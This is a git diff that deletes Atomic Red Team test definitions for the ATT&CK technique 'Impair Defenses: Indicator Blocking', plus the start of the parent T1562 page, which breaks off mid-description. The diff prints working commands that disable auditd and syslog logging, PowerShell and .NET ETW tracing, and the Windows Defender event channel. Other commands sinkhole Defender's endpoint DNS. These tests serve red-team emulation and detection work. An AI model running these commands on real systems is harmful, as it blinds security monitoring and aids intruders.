diff --git a/atomics/T1562.006/T1562.006.md b/atomics/T1562.006/T1562.006.md deleted file mode 100644 index 56970434..00000000 --- a/atomics/T1562.006/T1562.006.md +++ /dev/null 
@@ -1,407 +0,0 @@ -# T1562.006 - Impair Defenses: Indicator Blocking - -## Description from ATT&CK - -> An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting(Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW)(Citation: Microsoft About Event Tracing 2018), by tampering settings that control the collection and flow of event telemetry.(Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). -> -> For example, adversaries may modify the `File` value in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security to hide their malicious actions in a new or different .evtx log file. This action does not require a system reboot and takes effect immediately.(Citation: disable_win_evt_logging) -> -> ETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) Set-EtwTraceProvider cmdlet or by interfacing directly with the Registry to make alterations. -> -> In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products. 
-> -> In Linux environments, adversaries may disable or reconfigure log processing tools such as syslog or nxlog to inhibit detection and monitoring capabilities to facilitate follow on behaviors. (Citation: LemonDuck) ESXi also leverages syslog, which can be reconfigured via commands such as `esxcli system syslog config set` and `esxcli system syslog config reload`.(Citation: Google Cloud Threat Intelligence ESXi VIBs 2022)(Citation: Broadcom Configuring syslog on ESXi) - -[Source](https://attack.mitre.org/techniques/T1562/006) - -## Atomic Tests - -- [Atomic Test #1: Auditing Configuration Changes on Linux Host](#atomic-test-1-auditing-configuration-changes-on-linux-host) -- [Atomic Test #2: Auditing Configuration Changes on FreeBSD Host](#atomic-test-2-auditing-configuration-changes-on-freebsd-host) -- [Atomic Test #3: Logging Configuration Changes on Linux Host](#atomic-test-3-logging-configuration-changes-on-linux-host) -- [Atomic Test #4: Logging Configuration Changes on FreeBSD Host](#atomic-test-4-logging-configuration-changes-on-freebsd-host) -- [Atomic Test #5: Disable Powershell ETW Provider - Windows](#atomic-test-5-disable-powershell-etw-provider---windows) -- [Atomic Test #6: Disable .NET Event Tracing for Windows Via Registry (cmd)](#atomic-test-6-disable-net-event-tracing-for-windows-via-registry-cmd) -- [Atomic Test #7: Disable .NET Event Tracing for Windows Via Registry (powershell)](#atomic-test-7-disable-net-event-tracing-for-windows-via-registry-powershell) -- [Atomic Test #8: LockBit Black - Disable the ETW Provider of Windows Defender -cmd](#atomic-test-8-lockbit-black---disable-the-etw-provider-of-windows-defender--cmd) -- [Atomic Test #9: LockBit Black - Disable the ETW Provider of Windows Defender -Powershell](#atomic-test-9-lockbit-black---disable-the-etw-provider-of-windows-defender--powershell) -- [Atomic Test #10: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - 
Cmd](#atomic-test-10-disable-net-event-tracing-for-windows-via-environment-variable-hkcu-registry---cmd) -- [Atomic Test #11: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - PowerShell](#atomic-test-11-disable-net-event-tracing-for-windows-via-environment-variable-hkcu-registry---powershell) -- [Atomic Test #12: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - Cmd](#atomic-test-12-disable-net-event-tracing-for-windows-via-environment-variable-hklm-registry---cmd) -- [Atomic Test #13: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - PowerShell](#atomic-test-13-disable-net-event-tracing-for-windows-via-environment-variable-hklm-registry---powershell) -- [Atomic Test #14: Block Cybersecurity communication by leveraging Windows Name Resolution Policy Table](#atomic-test-14-block-cybersecurity-communication-by-leveraging-windows-name-resolution-policy-table) - -### Atomic Test #1: Auditing Configuration Changes on Linux Host - -Emulates modification of auditd configuration files - -**Supported Platforms:** Linux - -**auto_generated_guid:** `212cfbcf-4770-4980-bc21-303e37abd0e3` - -#### Inputs - -| Name | Description | Type | Default Value | -|------|-------------|------|---------------| -| audisp_config_file_name | The name of the audispd configuration file to be changed | string | audispd.conf| -| auditd_config_file_name | The name of the auditd configuration file to be changed | string | auditd.conf| -| libaudit_config_file_name | The name of the libaudit configuration file to be changed | string | libaudit.conf| - -#### Attack Commands: Run with `bash`! Elevation Required (e.g. 
root or admin) - -```bash -sed -i '$ a #art_test_1562_006_1' /etc/audisp/#{audisp_config_file_name} -if [ -f "/etc/#{auditd_config_file_name}" ]; -then sed -i '$ a #art_test_1562_006_1' /etc/#{auditd_config_file_name} -else sed -i '$ a #art_test_1562_006_1' /etc/audit/#{auditd_config_file_name} -fi -sed -i '$ a #art_test_1562_006_1' /etc/#{libaudit_config_file_name} -``` - -#### Cleanup Commands - -```bash -sed -i '$ d' /etc/audisp/#{audisp_config_file_name} -if [ -f "/etc/#{auditd_config_file_name}" ]; -then sed -i '$ d' /etc/#{auditd_config_file_name} -else sed -i '$ d' /etc/audit/#{auditd_config_file_name} -fi -sed -i '$ d' /etc/#{libaudit_config_file_name} -``` -### Atomic Test #2: Auditing Configuration Changes on FreeBSD Host - -Emulates modification of auditd configuration files - -**Supported Platforms:** Linux - -**auto_generated_guid:** `cedaf7e7-28ee-42ab-ba13-456abd35d1bd` - -#### Inputs - -| Name | Description | Type | Default Value | -|------|-------------|------|---------------| -| auditd_config_file_name | The name of the auditd configuration file to be changed | string | audit_event| - -#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) - -```sh -echo '#art_test_1562_006_1' >> /etc/security/#{auditd_config_file_name} -``` - -#### Cleanup Commands - -```sh -sed -i "" '/#art_test_1562_006_1/d' /etc/security/#{auditd_config_file_name} -``` -### Atomic Test #3: Logging Configuration Changes on Linux Host - -Emulates modification of syslog configuration. 
- -**Supported Platforms:** Linux - -**auto_generated_guid:** `7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c` - -#### Inputs - -| Name | Description | Type | Default Value | -|------|-------------|------|---------------| -| syslog_config_file_name | The name of the syslog configuration file to be changed | string | syslog.conf| -| rsyslog_config_file_name | The name of the rsyslog configuration file to be changed | string | rsyslog.conf| -| syslog_ng_config_file_name | The name of the syslog-ng configuration file to be changed | string | syslog-ng.conf| - -#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) - -```bash -if [ -f "/etc/#{syslog_config_file_name}" ]; -then sed -i '$ a #art_test_1562_006_2' /etc/#{syslog_config_file_name} -fi -if [ -f "/etc/#{rsyslog_config_file_name}" ]; -then sed -i '$ a #art_test_1562_006_2' /etc/#{rsyslog_config_file_name} -fi -if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ]; -then sed -i '$ a #art_test_1562_006_2' /etc/syslog-ng/#{syslog_ng_config_file_name} -fi -``` - -#### Cleanup Commands - -```bash -if [ -f "/etc/#{syslog_config_file_name}" ]; -then sed -i '$ d' /etc/#{syslog_config_file_name} -fi -if [ -f "/etc/#{rsyslog_config_file_name}" ]; -then sed -i '$ d' /etc/#{rsyslog_config_file_name} -fi -if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ]; -then sed -i '$ d' /etc/syslog-ng/#{syslog_ng_config_file_name} -fi -``` -### Atomic Test #4: Logging Configuration Changes on FreeBSD Host - -Emulates modification of syslog configuration. - -**Supported Platforms:** Linux - -**auto_generated_guid:** `6b8ca3ab-5980-4321-80c3-bcd77c8daed8` - -#### Inputs - -| Name | Description | Type | Default Value | -|------|-------------|------|---------------| -| syslog_config_file_name | The name of the syslog configuration file to be changed | string | syslog.conf| - -#### Attack Commands: Run with `sh`! Elevation Required (e.g. 
root or admin) - -```sh -if [ -f "/etc/#{syslog_config_file_name}" ]; -then echo '#art_test_1562_006_2' >> /etc/#{syslog_config_file_name} -fi -``` - -#### Cleanup Commands - -```sh -if [ -f "/etc/#{syslog_config_file_name}" ]; -then sed -i "" '/#art_test_1562_006_2/d' /etc/#{syslog_config_file_name} -fi -``` -### Atomic Test #5: Disable Powershell ETW Provider - Windows - -This test was created to disable the Microsoft Powershell ETW provider by using the built-in Windows tool, logman.exe. This provider is used as a common source of telemetry in AV/EDR solutions. - -**Supported Platforms:** Windows - -**auto_generated_guid:** `6f118276-121d-4c09-bb58-a8fb4a72ee84` - -#### Inputs - -| Name | Description | Type | Default Value | -|------|-------------|------|---------------| -| ps_exec_location | Location of PSExec. | string | PathToAtomicsFolder\..\ExternalPayloads\pstools\PsExec.exe| -| session | The session to disable. | string | EventLog-Application| -| provider | The provider to disable. | string | Microsoft-Windows-Powershell| - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - -```powershell -cmd /c "#{ps_exec_location}" -accepteula -i -s cmd.exe /c logman update trace "#{session}" --p "#{provider}" -ets -``` - -#### Cleanup Commands - -```powershell -cmd /c "#{ps_exec_location}" -i -s cmd.exe /c logman update trace "#{session}" -p "#{provider}" -ets -``` - -#### Dependencies: Run with `powershell`! - -##### Description: PSExec must be installed on the machine. 
- -###### Check Prereq Commands - -```powershell -if (Test-Path "#{ps_exec_location}") {exit 0} else {exit 1} -``` - -###### Get Prereq Commands - -```powershell -New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null -Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip" -expand-archive -literalpath "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\pstools" -force -``` - -### Atomic Test #6: Disable .NET Event Tracing for Windows Via Registry (cmd) - -Disables ETW for the .NET Framework using the reg.exe utility to update the Windows registry - -**Supported Platforms:** Windows - -**auto_generated_guid:** `8a4c33be-a0d3-434a-bee6-315405edbd5b` - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - -```cmd -REG ADD HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /t REG_DWORD /d 0 -``` - -#### Cleanup Commands - -```cmd -REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > nul 2>&1 -``` -### Atomic Test #7: Disable .NET Event Tracing for Windows Via Registry (powershell) - -Disables ETW for the .NET Framework using PowerShell to update the Windows registry - -**Supported Platforms:** Windows - -**auto_generated_guid:** `19c07a45-452d-4620-90ed-4c34fffbe758` - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. 
root or admin) - -```powershell -New-ItemProperty -Path HKLM:\Software\Microsoft\.NETFramework -Name ETWEnabled -Value 0 -PropertyType "DWord" -Force -``` - -#### Cleanup Commands - -```powershell -REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > $null 2>&1 -``` -### Atomic Test #8: LockBit Black - Disable the ETW Provider of Windows Defender -cmd - -An adversary can disable the ETW Provider of Windows Defender, -so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore. -https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a - -**Supported Platforms:** Windows - -**auto_generated_guid:** `f6df0b8e-2c83-44c7-ba5e-0fa4386bec41` - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - -```cmd -reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /t REG_DWORD /d 0 /f -``` - -#### Cleanup Commands - -```cmd -reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /f >nul 2>&1 -``` -### Atomic Test #9: LockBit Black - Disable the ETW Provider of Windows Defender -Powershell - -An adversary can disable the ETW Provider of Windows Defender, -so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore. -https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a - -**Supported Platforms:** Windows - -**auto_generated_guid:** `69fc085b-5444-4879-8002-b24c8e1a3e02` - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. 
root or admin) - -```powershell -New-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled -PropertyType DWord -Value 0 -Force -``` - -#### Cleanup Commands - -```powershell -Remove-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled -Force -ErrorAction Ignore -``` -### Atomic Test #10: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - Cmd - -Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKCU registry using the reg.exe utility. In order for changes to take effect a logout might be required. - -**Supported Platforms:** Windows - -**auto_generated_guid:** `fdac1f79-b833-4bab-b4a1-11b1ed676a4b` - -#### Attack Commands: Run with `command_prompt`! - -```cmd -REG ADD HKCU\Environment /v COMPlus_ETWEnabled /t REG_SZ /d 0 /f -``` - -#### Cleanup Commands - -```cmd -REG DELETE HKCU\Environment /v COMPlus_ETWEnabled /f > nul 2>&1 -``` -### Atomic Test #11: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - PowerShell - -Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKCU registry using PowerShell. In order for changes to take effect a logout might be required. - -**Supported Platforms:** Windows - -**auto_generated_guid:** `b42c1f8c-399b-47ae-8fd8-763181395fee` - -#### Attack Commands: Run with `powershell`! 
- -```powershell -New-ItemProperty -Path HKCU:\Environment -Name COMPlus_ETWEnabled -Value 0 -PropertyType "String" -Force -``` - -#### Cleanup Commands - -```powershell -Remove-ItemProperty -Path HKCU:\Environment -Name COMPlus_ETWEnabled -``` -### Atomic Test #12: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - Cmd - -Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKLM registry using the reg.exe utility. In order for changes to take effect a reboot might be required. - -**Supported Platforms:** Windows - -**auto_generated_guid:** `110b4281-43fe-405f-a184-5d8eaf228ebf` - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - -```cmd -REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v COMPlus_ETWEnabled /t REG_SZ /d 0 /f -``` - -#### Cleanup Commands - -```cmd -REG DELETE "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v COMPlus_ETWEnabled /f > nul 2>&1 -``` -### Atomic Test #13: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - PowerShell - -Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKLM registry using PowerShell. In order for changes to take effect a reboot might be required. - -**Supported Platforms:** Windows - -**auto_generated_guid:** `4d61779d-be7f-425c-b560-0cafb2522911` - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. 
root or admin) - -```powershell -New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" -Name COMPlus_ETWEnabled -Value 0 -PropertyType "String" -Force -``` - -#### Cleanup Commands - -```powershell -Remove-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" -Name COMPlus_ETWEnabled -``` -### Atomic Test #14: Block Cybersecurity communication by leveraging Windows Name Resolution Policy Table - -Adversaries are redirecting DNS queries to an incorrect or malicious DNS server IP, thereby blocking legitimate communications and potentially compromising the security infrastructure. This atomic test aims to respond with 127.0.0.1 when a DNS query is made for endpoint.security.microsoft.com. - -**Supported Platforms:** Windows - -**auto_generated_guid:** `1174b5df-2c33-490f-8854-f5eb80c907ca` - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - -```powershell -Add-DnsClientNrptRule -Namespace ".endpoint.security.microsoft.com" -NameServers 127.0.0.1 -Comment "Silenced by Name Resolution Policy Table" -Add-DnsClientNrptRule -Namespace "endpoint.security.microsoft.com" -NameServers 127.0.0.1 -Comment "Silenced by Name Resolution Policy Table" -Clear-DnsClientCache -``` - -#### Cleanup Commands - -```powershell -try { - # Get all current NRPT rules - $DnsClientNrptRules = Get-DnsClientNrptRule | Where-Object { $_.Comment -eq 'Silenced by Name Resolution Policy Table' } - - # Remove each NRPT rule - foreach ($rule in $DnsClientNrptRules) { - Remove-DnsClientNrptRule -Name $rule.Name -Force - } - - # Clear DNS client cache - Clear-DnsClientCache - Write-Host "All NRPT rules have been removed and the DNS cache has been cleared." -} - -catch { - Write-Host "An error occurred: $_" -} -Clear-DnsClientCache -``` diff --git a/atomics/T1562.006/T1562.006.yaml b/atomics/T1562.006/T1562.006.yaml deleted file mode 100644 index b5745587..00000000 
--- a/atomics/T1562.006/T1562.006.yaml +++ /dev/null 
@@ -1,272 +0,0 @@ -attack_technique: T1562.006 -display_name: 'Impair Defenses: Indicator Blocking' -atomic_tests: -- name: 'Auditing Configuration Changes on Linux Host' - auto_generated_guid: 212cfbcf-4770-4980-bc21-303e37abd0e3 - description: | - Emulates modification of auditd configuration files - supported_platforms: - - linux - input_arguments: - audisp_config_file_name: - description: The name of the audispd configuration file to be changed - type: string - default: audispd.conf - auditd_config_file_name: - description: The name of the auditd configuration file to be changed - type: string - default: auditd.conf - libaudit_config_file_name: - description: The name of the libaudit configuration file to be changed - type: string - default: libaudit.conf - executor: - command: | - sed -i '$ a #art_test_1562_006_1' /etc/audisp/#{audisp_config_file_name} - if [ -f "/etc/#{auditd_config_file_name}" ]; - then sed -i '$ a #art_test_1562_006_1' /etc/#{auditd_config_file_name} - else sed -i '$ a #art_test_1562_006_1' /etc/audit/#{auditd_config_file_name} - fi - sed -i '$ a #art_test_1562_006_1' /etc/#{libaudit_config_file_name} - cleanup_command: | - sed -i '$ d' /etc/audisp/#{audisp_config_file_name} - if [ -f "/etc/#{auditd_config_file_name}" ]; - then sed -i '$ d' /etc/#{auditd_config_file_name} - else sed -i '$ d' /etc/audit/#{auditd_config_file_name} - fi - sed -i '$ d' /etc/#{libaudit_config_file_name} - name: bash - elevation_required: true -- name: 'Auditing Configuration Changes on FreeBSD Host' - auto_generated_guid: cedaf7e7-28ee-42ab-ba13-456abd35d1bd - description: | - Emulates modification of auditd configuration files - supported_platforms: - - linux - input_arguments: - auditd_config_file_name: - description: The name of the auditd configuration file to be changed - type: string - default: audit_event - executor: - command: | - echo '#art_test_1562_006_1' >> /etc/security/#{auditd_config_file_name} - cleanup_command: | - sed -i "" 
'/#art_test_1562_006_1/d' /etc/security/#{auditd_config_file_name} - name: sh - elevation_required: true -- name: 'Logging Configuration Changes on Linux Host' - auto_generated_guid: 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c - description: | - Emulates modification of syslog configuration. - supported_platforms: - - linux - input_arguments: - syslog_config_file_name: - description: The name of the syslog configuration file to be changed - type: string - default: syslog.conf - rsyslog_config_file_name: - description: The name of the rsyslog configuration file to be changed - type: string - default: rsyslog.conf - syslog_ng_config_file_name: - description: The name of the syslog-ng configuration file to be changed - type: string - default: syslog-ng.conf - executor: - command: | - if [ -f "/etc/#{syslog_config_file_name}" ]; - then sed -i '$ a #art_test_1562_006_2' /etc/#{syslog_config_file_name} - fi - if [ -f "/etc/#{rsyslog_config_file_name}" ]; - then sed -i '$ a #art_test_1562_006_2' /etc/#{rsyslog_config_file_name} - fi - if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ]; - then sed -i '$ a #art_test_1562_006_2' /etc/syslog-ng/#{syslog_ng_config_file_name} - fi - cleanup_command: | - if [ -f "/etc/#{syslog_config_file_name}" ]; - then sed -i '$ d' /etc/#{syslog_config_file_name} - fi - if [ -f "/etc/#{rsyslog_config_file_name}" ]; - then sed -i '$ d' /etc/#{rsyslog_config_file_name} - fi - if [ -f "/etc/syslog-ng/#{syslog_ng_config_file_name}" ]; - then sed -i '$ d' /etc/syslog-ng/#{syslog_ng_config_file_name} - fi - name: bash - elevation_required: true -- name: 'Logging Configuration Changes on FreeBSD Host' - auto_generated_guid: 6b8ca3ab-5980-4321-80c3-bcd77c8daed8 - description: | - Emulates modification of syslog configuration. 
- supported_platforms: - - linux - input_arguments: - syslog_config_file_name: - description: The name of the syslog configuration file to be changed - type: string - default: syslog.conf - executor: - command: | - if [ -f "/etc/#{syslog_config_file_name}" ]; - then echo '#art_test_1562_006_2' >> /etc/#{syslog_config_file_name} - fi - cleanup_command: | - if [ -f "/etc/#{syslog_config_file_name}" ]; - then sed -i "" '/#art_test_1562_006_2/d' /etc/#{syslog_config_file_name} - fi - name: sh - elevation_required: true - -- name: Disable Powershell ETW Provider - Windows - auto_generated_guid: 6f118276-121d-4c09-bb58-a8fb4a72ee84 - description: This test was created to disable the Microsoft Powershell ETW provider by using the built-in Windows tool, logman.exe. This provider is used as a common source of telemetry in AV/EDR solutions. - supported_platforms: - - windows - input_arguments: - ps_exec_location: - description: Location of PSExec. - type: string - default: PathToAtomicsFolder\..\ExternalPayloads\pstools\PsExec.exe - session: - description: The session to disable. - type: string - default: EventLog-Application - provider: - description: The provider to disable. - type: string - default: Microsoft-Windows-Powershell - dependency_executor_name: powershell - dependencies: - - description: PSExec must be installed on the machine. 
- prereq_command: if (Test-Path "#{ps_exec_location}") {exit 0} else {exit 1} - get_prereq_command: |- - New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null - Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip" - expand-archive -literalpath "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\pstools" -force - executor: - command: cmd /c "#{ps_exec_location}" -accepteula -i -s cmd.exe /c logman update trace "#{session}" --p "#{provider}" -ets - cleanup_command: cmd /c "#{ps_exec_location}" -i -s cmd.exe /c logman update trace "#{session}" -p "#{provider}" -ets - name: powershell - elevation_required: true -- name: Disable .NET Event Tracing for Windows Via Registry (cmd) - auto_generated_guid: 8a4c33be-a0d3-434a-bee6-315405edbd5b - description: Disables ETW for the .NET Framework using the reg.exe utility to update the Windows registry - supported_platforms: - - windows - executor: - command: REG ADD HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /t REG_DWORD /d 0 - cleanup_command: REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > nul 2>&1 - name: command_prompt - elevation_required: true -- name: Disable .NET Event Tracing for Windows Via Registry (powershell) - auto_generated_guid: 19c07a45-452d-4620-90ed-4c34fffbe758 - description: Disables ETW for the .NET Framework using PowerShell to update the Windows registry - supported_platforms: - - windows - executor: - command: New-ItemProperty -Path HKLM:\Software\Microsoft\.NETFramework -Name ETWEnabled -Value 0 -PropertyType "DWord" -Force - cleanup_command: REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > $null 2>&1 - name: powershell - elevation_required: true -- name: LockBit Black - Disable the ETW Provider of Windows Defender -cmd - auto_generated_guid: 
f6df0b8e-2c83-44c7-ba5e-0fa4386bec41 - description: | - An adversary can disable the ETW Provider of Windows Defender, - so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore. - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a - supported_platforms: - - windows - executor: - command: | - reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /t REG_DWORD /d 0 /f - cleanup_command: | - reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /f >nul 2>&1 - name: command_prompt - elevation_required: true -- name: LockBit Black - Disable the ETW Provider of Windows Defender -Powershell - auto_generated_guid: 69fc085b-5444-4879-8002-b24c8e1a3e02 - description: | - An adversary can disable the ETW Provider of Windows Defender, - so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore. - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a - supported_platforms: - - windows - executor: - command: | - New-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled -PropertyType DWord -Value 0 -Force - cleanup_command: | - Remove-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled -Force -ErrorAction Ignore - name: powershell - elevation_required: true -- name: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - Cmd - auto_generated_guid: fdac1f79-b833-4bab-b4a1-11b1ed676a4b - description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKCU registry using the reg.exe utility. In order for changes to take effect a logout might be required. 
- supported_platforms: - - windows - executor: - command: REG ADD HKCU\Environment /v COMPlus_ETWEnabled /t REG_SZ /d 0 /f - cleanup_command: REG DELETE HKCU\Environment /v COMPlus_ETWEnabled /f > nul 2>&1 - name: command_prompt -- name: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - PowerShell - auto_generated_guid: b42c1f8c-399b-47ae-8fd8-763181395fee - description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKCU registry using PowerShell. In order for changes to take effect a logout might be required. - supported_platforms: - - windows - executor: - command: New-ItemProperty -Path HKCU:\Environment -Name COMPlus_ETWEnabled -Value 0 -PropertyType "String" -Force - cleanup_command: Remove-ItemProperty -Path HKCU:\Environment -Name COMPlus_ETWEnabled - name: powershell -- name: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - Cmd - auto_generated_guid: 110b4281-43fe-405f-a184-5d8eaf228ebf - description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKLM registry using the reg.exe utility. In order for changes to take effect a reboot might be required. - supported_platforms: - - windows - executor: - command: REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v COMPlus_ETWEnabled /t REG_SZ /d 0 /f - cleanup_command: REG DELETE "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v COMPlus_ETWEnabled /f > nul 2>&1 - name: command_prompt - elevation_required: true -- name: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - PowerShell - auto_generated_guid: 4d61779d-be7f-425c-b560-0cafb2522911 - description: Disables ETW for the .NET Framework by setting the COMPlus_ETWEnabled environment variable to 0 in the HKLM registry using PowerShell. In order for changes to take effect a reboot might be required. 
- supported_platforms: - - windows - executor: - command: New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" -Name COMPlus_ETWEnabled -Value 0 -PropertyType "String" -Force - cleanup_command: Remove-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" -Name COMPlus_ETWEnabled - name: powershell - elevation_required: true -- name: Block Cybersecurity communication by leveraging Windows Name Resolution Policy Table - auto_generated_guid: 1174b5df-2c33-490f-8854-f5eb80c907ca - description: Adversaries are redirecting DNS queries to an incorrect or malicious DNS server IP, thereby blocking legitimate communications and potentially compromising the security infrastructure. This atomic test aims to respond with 127.0.0.1 when a DNS query is made for endpoint.security.microsoft.com. - supported_platforms: - - windows - executor: - command: |- - Add-DnsClientNrptRule -Namespace ".endpoint.security.microsoft.com" -NameServers 127.0.0.1 -Comment "Silenced by Name Resolution Policy Table" - Add-DnsClientNrptRule -Namespace "endpoint.security.microsoft.com" -NameServers 127.0.0.1 -Comment "Silenced by Name Resolution Policy Table" - Clear-DnsClientCache - cleanup_command: |- - try { - # Get all current NRPT rules - $DnsClientNrptRules = Get-DnsClientNrptRule | Where-Object { $_.Comment -eq 'Silenced by Name Resolution Policy Table' } - - # Remove each NRPT rule - foreach ($rule in $DnsClientNrptRules) { - Remove-DnsClientNrptRule -Name $rule.Name -Force - } - - # Clear DNS client cache - Clear-DnsClientCache - Write-Host "All NRPT rules have been removed and the DNS cache has been cleared." - } - - catch { - Write-Host "An error occurred: $_" - } - Clear-DnsClientCache - name: powershell - elevation_required: true diff --git a/atomics/T1562/T1562.md b/atomics/T1562/T1562.md deleted file mode 100644 index c4d31d89..00000000 --- a/atomics/T1562/T1562.md +++ /dev/null 
@@ -1,82 +0,0 @@ -# T1562 - Impair Defenses - -## Description from ATT&CK - -> Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators. -> -> Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out, preventing a system from shutting down, or disabling or modifying the update process. Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Google Cloud Mandiant UNC3886 2024)(Citation: Emotet shutdown) -> - -[Source](https://attack.mitre.org/techniques/T1562) - -## Atomic Tests - -- [Atomic Test #1: Windows Disable LSA Protection](#atomic-test-1-windows-disable-lsa-protection) -- [Atomic Test #2: Disable journal logging via systemctl utility](#atomic-test-2-disable-journal-logging-via-systemctl-utility) -- [Atomic Test #3: Disable journal logging via sed utility](#atomic-test-3-disable-journal-logging-via-sed-utility) - -### Atomic Test #1: Windows Disable LSA Protection - -The following Atomic adds a registry entry to disable LSA Protection. - -The LSA controls and manages user rights information, password hashes and other important bits of information in memory. Attacker tools, such as mimikatz, rely on accessing this content to scrape password hashes or clear-text passwords. 
